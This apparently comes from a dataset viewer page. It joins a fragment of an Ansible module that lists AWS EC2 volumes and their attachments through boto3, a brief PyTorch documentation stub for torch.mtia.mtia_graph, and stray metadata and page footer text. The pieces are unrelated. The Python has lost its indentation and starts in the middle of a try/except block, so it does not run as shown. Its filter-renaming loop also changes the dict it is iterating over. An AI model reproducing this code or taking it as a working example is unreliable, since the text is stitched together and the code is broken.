from botocore.exceptions import ClientError
except ImportError:
pass # caught by imported HAS_BOTO3
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.ec2 import connect_to_aws, ec2_argument_spec, get_aws_connection_info, boto3_conn, HAS_BOTO3, boto3_tag_list_to_ansible_dict
from ansible.module_utils.ec2 import ansible_dict_to_boto3_filter_list, camel_dict_to_snake_dict
from ansible.module_utils._text import to_native
def get_volume_info(volume, region):
attachment = volume["attachments"]
volume_info = {
'create_time': volume["create_time"],
'id': volume["volume_id"],
'encrypted': volume["encrypted"],
'iops': volume["iops"] if "iops" in volume else None,
'size': volume["size"],
'snapshot_id': volume["snapshot_id"],
'status': volume["state"],
'type': volume["volume_type"],
'zone': volume["availability_zone"],
'region': region,
'attachment_set': {
'attach_time': attachment[0]["attach_time"] if len(attachment) > 0 else None,
'device': attachment[0]["device"] if len(attachment) > 0 else None,
'instance_id': attachment[0]["instance_id"] if len(attachment) > 0 else None,
'status': attachment[0]["state"] if len(attachment) > 0 else None,
'delete_on_termination': attachment[0]["delete_on_termination"] if len(attachment) > 0 else None
},
'tags': boto3_tag_list_to_ansible_dict(volume['tags'])
}
return volume_info
def describe_volumes_with_backoff(connection, filters):
paginator = connection.get_paginator('describe_volumes')
return paginator.paginate(Filters=filters).build_full_result()
def list_ec2_volumes(connection, module, region):
# Replace filter key underscores with dashes, for compatibility, except if we're dealing with tags
sanitized_filters = module.params.get("filters")
for key in sanitized_filters:
if not key.startswith("tag:"):
sanitized_filters[key.replace("_", "-")] = sanitized_filters.pop(key)
volume_dict_array = []
try:
all_volumes = describe_volumes_with_backoff(connection, ansible_dict_to_boto3_filter_list(sanitized_filters))
except ClientError as e:
module.fail_json(msg=e.response, exception=traceback.format_exc())
for volume in all_volumes["Volumes"]:
volume = camel_dict_to_snake_dict(volume, ignore_list=['Tags'])
volume_dict_array.append(get_volume_info(volume, region))
module.exit_json(volumes=volume_dict_array)
def main():
argument_spec = ec2_argument_spec()
argument_spec.update(
dict(
filters=dict(default=None, type='dict')
)
)
module = AnsibleModule(argument_spec=argument_spec)
if not HAS_BOTO3:
module.fail_json(msg='boto3 required for this module')
region, ec2_url, aws_connect_params = get_aws_connection_info(module, boto3=True)
connection = boto3_conn(
module,
conn_type='client',
resource='ec2',
region=region,
endpoint=ec2_url,
**aws_connect_params
)
list_ec2_volumes(connection, module, region)
if __name__ == '__main__':
main() | unknown | codeparrot/codeparrot-clean | ||
# torch.mtia.mtia_graph
The MTIA backend is implemented out of the tree, only interfaces are defined here.
```{eval-rst}
.. automodule:: torch.mtia.mtia_graph
```
```{eval-rst}
.. currentmodule:: torch.mtia.mtia_graph
```
```{eval-rst}
.. autofunction:: graph_pool_handle
```
```{eval-rst}
.. autoclass:: MTIAGraph
:members:
```
```{eval-rst}
.. autoclass:: graph
:members:
``` | unknown | github | https://github.com/pytorch/pytorch | docs/source/mtia.mtia_graph.md |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.